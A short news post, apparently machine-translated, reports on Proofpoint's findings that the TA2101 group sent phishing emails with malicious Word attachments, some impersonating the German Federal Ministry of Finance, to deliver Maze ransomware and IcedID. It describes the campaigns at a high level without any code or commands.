Usually, these tools are used by companies to identify vulnerabilities and protect their systems. However, we have seen other hacking teams as well Cobalt Group, APT32 and APT19 use them to develop malware.
The researchers also discovered that the new hacking team TA2101 used the ransomware Maze to attack an Italian company, as well as his social engineering technique.
Exploit Windows via malicious Word documents
The attacks by the TA2101 team were discovered by its researchers Proofpoint. The malicious campaign took place between 16 October and 12 November 2019. The hackers were sending maliciously emails to companies in Germany, Italy and the United States. Their main goals were IT services, construction companies and healthcare organizations.
According to researchers, most emails contained malicious Word documents.
The message urged victims to open the malicious attachment. If users clicked on the document, they would be enabled running the PowerShell script.
The Powershell script, in turn, downloaded and installed it Maze of ransomware to the victim's device.
The hackers were sending different emails to the victims. In some of them, he seemed like the sender of it German Federal Ministry of Finance. The victims they should open the malicious document to find information on how to avoid further taxation and penalties.
Recently, Proofpoint researchers found another email campaign containing maliciously Word documents that infected victims' systems with IcedID banking Trojan.
And in that campaign, the malicious document led to the installation of malware, payload IcedID, into the corporate systems. The main objective of the campaign was health care organizations. The system contamination process was the same as the recent TA2101 campaign.
The techniques used by this hacking team are very sophisticated and show that hackers are very experienced and ready for many more attacks.
How useful was this post?
Average rating / 5. Vote count:
No votes so far! Be the first to rate this post.